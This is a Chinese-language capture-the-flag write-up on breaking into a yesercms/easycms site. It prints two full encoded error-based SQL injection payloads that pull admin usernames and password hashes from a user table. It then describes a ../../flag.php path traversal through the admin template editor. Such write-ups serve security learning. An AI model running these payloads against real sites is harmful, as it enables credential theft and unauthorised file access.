打开来是一个不知道什么cms的页面:

上cms指纹识别:

但是貌似识别不出来,想想其他方法
比如搜一搜传递的变量名,也就是URL后面跟着的一大堆东西

点进去看了看,跟题目的cms差不多
差不多确定是easycms了,搜一搜easycms漏洞
但是找到的大多数不能用,
最终还是看了大佬们写的writeup
URL/celive/live/header.php
处有一个xpath注入漏洞xpath注入科普
payload:
第一段:

xajax=Postdata&xajaxargs[0]=
detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat %2528username%252C%2527%257C%2527%252Cpassword %2529%2529%2520from%2520yesercms_user %2529%252C1%252C32%2529%252C0x5d %2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529–%2520

第二段:

xajax=Postdata&xajaxargs[0]=
detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat %2528username%252C%2527%257C%2527%252Cpassword %2529%2529%2520from%2520yesercms_user %2529%252C10%252C32%2529%252C0x5d %2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529–%2520


这里得分成两段显示:

得到管理员的账户是admin
密码是md5加密的Yeser231

登陆后台:

找地方上传shell,自己找了很久没有找到地方,最后还是看的大佬的wp
在模版->当前模版编辑处

点击编辑,这个时候会把这个文件名传进去,
然后再显示出来这个文件的内容:

这个时候直接看到提示:flag在网站根目录下的flag.php中
把id换成
../../flag.php
即可得到flag: